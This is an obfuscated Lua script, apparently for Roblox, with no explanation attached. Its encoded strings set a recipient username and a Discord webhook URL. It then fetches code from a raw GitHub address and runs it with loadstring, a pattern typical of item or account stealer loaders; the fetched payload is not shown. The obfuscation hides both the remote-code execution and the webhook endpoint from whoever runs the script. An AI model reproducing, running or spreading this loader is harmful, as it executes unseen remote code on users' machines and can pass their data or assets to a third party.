--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==1) then v21=nil;function v21(v31,v32,v33)if v33 then local v71=0;local v72;while true do if (v71==((0 -0) -0)) then v72=(v31/((5 -3)^(v32-(1 -(1065 -(68 + 997))))))%((4 -2)^(((v33-(620 -(555 + 64))) -(v32-(932 -(857 + 74)))) + (569 -(367 + 201)))) ;return v72-(v72%(928 -(214 + 713))) ;end end else local v73=0 + 0 ;local v74;while true do if (v73==(0 + 0)) then v74=2^(v32-(878 -(282 + 595))) ;return (((v31%(v74 + v74))>=v74) and (1638 -((2793 -(226 + 1044)) + 114))) or (0 + 0) ;end end end end v22=nil;v18=2;end if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v34)if (v1(v34,2)==79) then local v75=0;while true do if (v75==0) then v20=v0(v3(v34,1,1));return "";end end else local v76=0;local v77;while true do if (0==v76) then v77=v2(v0(v34,16));if v20 then local v103=0;local v104;while true do if (0==v103) then v104=v5(v77,v20);v20=nil;v103=1;end if (v103==1) then return v104;end end else return v77;end break;end end end end);v18=1;end if (v18==3) then v24=nil;function v24()local v35=0 -0 ;local v36;local v37;local v38;local v39;while true do if (v35==(118 -(32 + 85))) then return (v39 * (31011612 -14234396)) + (v38 * (64226 + 1310)) + (v37 * ((446 + 160) -(87 + (1045 -782)))) + v36 ;end if (v35==((952 -(802 + 150)) + 0)) then v36,v37,v38,v39=v1(v16,v19,v19 + (960 -(892 + 65)) );v19=v19 + 4 ;v35=2 -1 ;end end end v25=nil;v18=4;end if (v18==4) then function v25()local v40=v24();local v41=v24();local v42=3 -2 ;local v43=(v21(v41,2 -1 ,36 -16 ) * (2^(24 + 8))) + v40 ;local v44=v21(v41,1018 -(915 + 36 + 46) ,31);local v45=((v21(v41,90 -58 )==(1 -0)) and  -(1 + 0)) or (1 -0) ;if (v44==((1625 -(145 + 293)) -(1069 + 118))) then if (v43==(0 -0)) then return v45 * (0 -(430 -(44 + 386))) ;else v44=(1487 -(998 + 488)) + 0 ;v42=0 -0 ;end elseif (v44==(646 + 1385 + 16)) then return ((v43==(791 -(368 + 423))) and (v45 * ((3 -2)/(18 -(10 + 8))))) or (v45 * NaN) ;end return v8(v45,v44-(3934 -2911) ) * (v42 + (v43/(2^(494 -(416 + 26))))) ;end v26=nil;function v26(v46)local v47;if  not v46 then local v78=0 + 0 ;while true do if (v78==(0 + 0)) then v46=v24();if (v46==((1631 -(814 + 45)) -(201 + 571))) then return "";end break;end end end v47=v3(v16,v19,(v19 + v46) -(1139 -(116 + 1022)) );v19=v19 + v46 ;local v48={};for v69=(9 -5) -(1 + 2) , #v47 do v48[v69]=v2(v1(v3(v47,v69,v69)));end return v6(v48);end v18=5;end if (v18==6) then v29=nil;function v29()local v49=0 -0 ;local v50;local v51;local v52;local v53;local v54;local v55;local v56;local v57;while true do if (v49==(1 -0)) then v52=nil;v53=nil;v49=2;end if ((611 -(602 + 9))==v49) then v50=0;v51=nil;v49=1 + 0 ;end if (v49==3) then v56=nil;v57=nil;v49=1 + 3 ;end if (v49==2) then v54=nil;v55=nil;v49=1 + 2 ;end if ((876 -(826 + 46))~=v49) then else while true do if (v50==(947 -(245 + 702))) then local v99=0;while true do if (v99~=(0 + 0)) then else v51=529 -(406 + 123) ;v52=nil;v99=1770 -(1749 + 20) ;end if (v99==(1 + 0)) then v50=1323 -(1249 + 73) ;break;end end end if (v50~=(1900 -(260 + 1638))) then else local v100=440 -(382 + 58) ;local v101;while true do if (v100~=(0 -0)) then else v101=0 + 0 ;while true do if (v101~=(1146 -(466 + 679))) then else v50=5 -2 ;break;end if (v101~=(0 -0)) then else v55=nil;v56=nil;v101=2 -1 ;end end break;end end end if (v50==(1903 -(106 + 1794))) then v57=nil;while true do local v105=0 + 0 ;local v106;local v107;while true do if (v105~=(0 + 0)) then else v106=0 + 0 ;v107=nil;v105=1691 -(1121 + 569) ;end if (v105==(2 -1)) then while true do if (v106~=(214 -(22 + 192))) then else v107=683 -(483 + 200) ;while true do if (v107==(0 -0)) then if (v51==2) then local v168=0 -0 ;local v169;while true do if ((0 -0)==v168) then v169=765 -(468 + 297) ;while true do if (v169~=(114 -(4 + 110))) then else local v178=0;while true do if (v178~=(584 -(57 + 527))) then else for v188=1,v56 do local v189=0 -0 ;local v190;local v191;local v192;local v193;while true do if (v189~=2) then else while true do if (v190~=(1428 -(41 + 1386))) then else v193=nil;while true do if (v191==1) then if (v192==(104 -(17 + 86))) then v193=v22()~=(0 + 0) ;elseif (v192==(2 + 0)) then v193=v25();elseif (v192~=(6 -3)) then else v193=v26();end v57[v188]=v193;break;end if (v191==(0 -0)) then local v204=0 -0 ;local v205;while true do if (v204~=0) then else v205=166 -(122 + 44) ;while true do if (v205==(0 -0)) then local v216=0 -0 ;while true do if (v216==(0 + 0)) then local v220=0;while true do if (1==v220) then v216=1;break;end if ((0 + 0)==v220) then v192=v22();v193=nil;v220=1;end end end if (v216~=(2 -1)) then else v205=1 + 0 ;break;end end end if (v205==1) then v191=1 -0 ;break;end end break;end end end end break;end if ((65 -(30 + 35))~=v190) then else local v200=0 + 0 ;while true do if (v200==(1257 -(1043 + 214))) then v191=0 -0 ;v192=nil;v200=1213 -(323 + 889) ;end if (v200==(2 -1)) then v190=1;break;end end end end break;end if (v189==0) then v190=0;v191=nil;v189=581 -(361 + 219) ;end if (v189~=(321 -(53 + 267))) then else v192=nil;v193=nil;v189=1 + 1 ;end end end v55[3]=v22();v178=414 -(15 + 398) ;end if (v178~=1) then else v169=1 + 0 ;break;end end end if (v169~=(983 -(18 + 964))) then else for v180=1,v24() do local v181=0 -0 ;local v182;local v183;while true do if (v181==(1 + 0)) then while true do if ((849 -(254 + 595))~=v182) then else v183=v22();if (v21(v183,127 -(55 + 71) ,1)==(0 + 0)) then local v194=0 -0 ;local v195;local v196;local v197;local v198;local v199;while true do if (v194~=(851 -(20 + 830))) then else v197=nil;v198=nil;v194=2 + 0 ;end if (v194==2) then v199=nil;while true do if (v195==(128 -(116 + 10))) then while true do if (v196==(1 + 0)) then local v208=738 -(542 + 196) ;local v209;while true do if (v208==(0 -0)) then v209=0 + 0 ;while true do if (v209~=(1 + 0)) then else v196=941 -(714 + 225) ;break;end if (v209==(0 + 0)) then local v221=0 -0 ;local v222;while true do if (v221==(0 -0)) then v222=0;while true do if ((2 -1)~=v222) then else v209=807 -(118 + 688) ;break;end if (v222==(1551 -(1126 + 425))) then v199={v23(),v23(),nil,nil};if (v197==0) then local v226=1121 -(118 + 1003) ;local v227;local v228;while true do if (v226~=(0 -0)) then else v227=1886 -(927 + 959) ;v228=nil;v226=378 -(142 + 235) ;end if (v226==(4 -3)) then while true do if (v227==(0 + 0)) then v228=0 -0 ;while true do if (v228==(977 -(553 + 424))) then v199[100 -(11 + 86) ]=v23();v199[9 -5 ]=v23();break;end end break;end end break;end end elseif (v197==1) then v199[3]=v24();elseif (v197==2) then v199[288 -(175 + 110) ]=v24() -((4 -2)^16) ;elseif (v197==(5 -2)) then local v235=0 + 0 ;local v236;while true do if ((0 + 0)~=v235) then else v236=0 + 0 ;while true do if (v236==(0 + 0)) then v199[3]=v24() -((1063 -(810 + 251))^(12 + 4)) ;v199[2 + 2 ]=v23();break;end end break;end end end v222=1 + 0 ;end end break;end end end end break;end end end if ((3 + 0)==v196) then if (v21(v198,2 + 1 ,3)==(734 -(711 + 22))) then v199[8 -4 ]=v57[v199[4]];end v52[v180]=v199;break;end if (v196~=(0 -0)) then else local v211=0 -0 ;local v212;while true do if (0==v211) then v212=0 + 0 ;while true do if (v212==1) then v196=4 -3 ;break;end if (v212==(753 -(239 + 514))) then local v223=0 + 0 ;local v224;while true do if (v223~=(0 + 0)) then else v224=1329 -(797 + 532) ;while true do if ((1 + 0)~=v224) then else v212=1 + 0 ;break;end if (v224~=0) then else v197=v21(v183,2,1747 -(1344 + 400) );v198=v21(v183,4,411 -(255 + 150) );v224=2 -1 ;end end break;end end end end break;end end end if (v196==(1204 -(373 + 829))) then local v213=0;local v214;local v215;while true do if (v213==(732 -(476 + 255))) then while true do if (v214~=(1130 -(369 + 761))) then else v215=0 + 0 ;while true do if (v215==(0 -0)) then local v225=0;while true do if (v225~=(0 -0)) then else if (v21(v198,1,1 -0 )==1) then v199[2]=v57[v199[240 -(64 + 174) ]];end if (v21(v198,1 + 1 ,2)~=(1 -0)) then else v199[339 -(144 + 192) ]=v57[v199[219 -(42 + 174) ]];end v225=1;end if (v225~=(1 + 0)) then else v215=1 + 0 ;break;end end end if (v215~=(1 + 0)) then else v196=3 + 0 ;break;end end break;end end break;end if ((0 + 0)~=v213) then else v214=1504 -(363 + 1141) ;v215=nil;v213=1581 -(1183 + 397) ;end end end end break;end if (v195==(339 -(118 + 220))) then v198=nil;v199=nil;v195=2;end if (v195==0) then local v206=0;local v207;while true do if (v206~=(0 -0)) then else v207=0 + 0 ;while true do if (v207==(0 + 0)) then local v219=0 + 0 ;while true do if (v219==(1976 -(1913 + 62))) then v207=1;break;end if (v219~=(1493 -(711 + 782))) then else v196=0 -0 ;v197=nil;v219=470 -(270 + 199) ;end end end if ((1 + 0)~=v207) then else v195=2 -1 ;break;end end break;end end end end break;end if (v194==(0 + 0)) then v195=0;v196=nil;v194=1;end end end break;end end break;end if (v181~=(1933 -(565 + 1368))) then else v182=0 -0 ;v183=nil;v181=2 -1 ;end end end v51=1664 -(1477 + 184) ;break;end end break;end end end if ((3 -0)==v51) then local v170=0 + 0 ;local v171;local v172;while true do if (v170==0) then v171=0 + 0 ;v172=nil;v170=1;end if (v170==(857 -(564 + 292))) then while true do if ((0 -0)==v171) then v172=0;while true do if (v172~=(0 -0)) then else local v185=1167 -(645 + 522) ;local v186;while true do if (v185==0) then v186=1790 -(1010 + 780) ;while true do if (v186==0) then for v201=305 -(244 + 60) ,v24() do v53[v201-1 ]=v29();end return v55;end end break;end end end end break;end end break;end end end v107=1 + 0 ;end if (v107==(1 + 0)) then if (v51==1) then local v173=476 -(41 + 435) ;local v174;local v175;while true do if (v173~=(1836 -(1045 + 791))) then else v174=1001 -(938 + 63) ;v175=nil;v173=1;end if (v173==(1 + 0)) then while true do if (v174==(1125 -(936 + 189))) then v175=0 + 0 ;while true do if (v175==(1574 -(1281 + 293))) then local v187=266 -(28 + 238) ;while true do if (v187~=(1614 -(1565 + 48))) then else v175=1560 -(1381 + 178) ;break;end if ((0 + 0)~=v187) then else v55={v52,v53,nil,v54};v56=v24();v187=1;end end end if ((1 -0)==v175) then v57={};v51=6 -4 ;break;end end break;end end break;end end end if (v51==(1092 -(975 + 117))) then local v176=1875 -(157 + 1718) ;local v177;while true do if (0~=v176) then else v177=470 -(381 + 89) ;while true do if (v177~=(1 + 0)) then else v54={};v51=1;break;end if (v177==(0 -0)) then local v179=0 + 0 ;while true do if (v179==(0 -0)) then v52={};v53={};v179=1019 -(697 + 321) ;end if (v179~=(2 -1)) then else v177=1;break;end end end end break;end end end break;end end break;end end break;end end end break;end if (v50==1) then local v102=0 -0 ;while true do if (v102==(0 -0)) then v53=nil;v54=nil;v102=1 + 0 ;end if (v102~=(1 -0)) then else v50=1457 -(990 + 465) ;break;end end end end break;end end end v30=nil;v18=7;end if (v18==7) then function v30(v58,v59,v60)local v61=0;local v62;local v63;local v64;while true do if (v61==1) then v64=v58[3];return function(...)local v82=v62;local v83=v63;local v84=v64;local v85=v28;local v86=1;local v87= -1;local v88={};local v89={...};local v90=v12("#",...) -1 ;local v91={};local v92={};for v96=0,v90 do if (v96>=v84) then v88[v96-v84 ]=v89[v96 + 1 ];else v92[v96]=v89[v96 + 1 ];end end local v93=(v90-v84) + 1 ;local v94;local v95;while true do v94=v82[v86];v95=v94[1];if (v95<=4) then if (v95<=1) then if (v95==0) then v92[v94[2]]=v60[v94[3]];else local v114=0;local v115;while true do if (0==v114) then v115=v94[2];v92[v115]=v92[v115](v13(v92,v115 + 1 ,v87));break;end end end elseif (v95<=2) then local v116=v94[2];local v117,v118=v85(v92[v116](v13(v92,v116 + 1 ,v94[3])));v87=(v118 + v116) -1 ;local v119=0;for v125=v116,v87 do v119=v119 + 1 ;v92[v125]=v117[v119];end elseif (v95==3) then v92[v94[2]]=v94[3]~=0 ;else v92[v94[2]]();end elseif (v95<=6) then if (v95>5) then local v120=0;local v121;local v122;while true do if (v120==1) then v92[v121 + 1 ]=v122;v92[v121]=v122[v94[4]];break;end if (v120==0) then v121=v94[2];v122=v92[v94[3]];v120=1;end end else v92[v94[2]]=v94[3];end elseif (v95<=7) then do return;end elseif (v95==8) then local v129=0;local v130;local v131;while true do if (v129==3) then v86=v86 + 1 ;v94=v82[v86];v92[v94[2]]=v60[v94[3]];v86=v86 + 1 ;v94=v82[v86];v92[v94[2]]=v60[v94[3]];v129=4;end if (v129==2) then v86=v86 + 1 ;v94=v82[v86];v92[v94[2]]=v60[v94[3]];v86=v86 + 1 ;v94=v82[v86];v92[v94[2]][v94[3]]=v94[4];v129=3;end if (v129==5) then v86=v86 + 1 ;v94=v82[v86];v92[v94[2]]=v94[3];break;end if (v129==4) then v86=v86 + 1 ;v94=v82[v86];v131=v94[2];v130=v92[v94[3]];v92[v131 + 1 ]=v130;v92[v131]=v130[v94[4]];v129=5;end if (v129==0) then v130=nil;v131=nil;v92[v94[2]]=v60[v94[3]];v86=v86 + 1 ;v94=v82[v86];v92[v94[2]][v94[3]]=v94[4];v129=1;end if (v129==1) then v86=v86 + 1 ;v94=v82[v86];v92[v94[2]]=v60[v94[3]];v86=v86 + 1 ;v94=v82[v86];v92[v94[2]][v94[3]]=v94[4];v129=2;end end else v92[v94[2]][v94[3]]=v94[4];end v86=v86 + 1 ;end end;end if (v61==0) then v62=v58[1];v63=v58[2];v61=1;end end end return v30(v29(),{},v17)(...);end if (v18==2) then function v22()local v65=v1(v16,v19,v19);v19=v19 + 1 ;return v65;end v23=nil;function v23()local v66=(0 -0) + 0 ;local v67;local v68;while true do if (v66==(1 + 0)) then return (v68 * (249 + 7)) + v67 ;end if (v66==(0 -0)) then v67,v68=v1(v16,v19,v19 + (1728 -(1668 + 58)) );v19=v19 + (628 -(512 + 114)) ;v66=(6 -4) -1 ;end end end v18=3;end end end v15("LOL!0A3O0003023O005F4703083O00557365724E616D6503073O007761726465647A03093O00557365724E616D653203073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O3132343632373235333734323031303336382F71594B312O5A4D48546545695855384F3469417445386C484131624E2D373268627243776A5357724463756B42692O39462D4654386C51742O5837324149794155753536030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F72695363726970745A000F3O0012083O00013O00304O0002000300124O00013O00304O0004000300124O00013O00304O0005000600124O00073O00122O000100083O00202O00010001000900122O0003000A4O0003000400014O0002000100044O00015O00022O00043O000100012O00073O00017O00",v9(),...);end
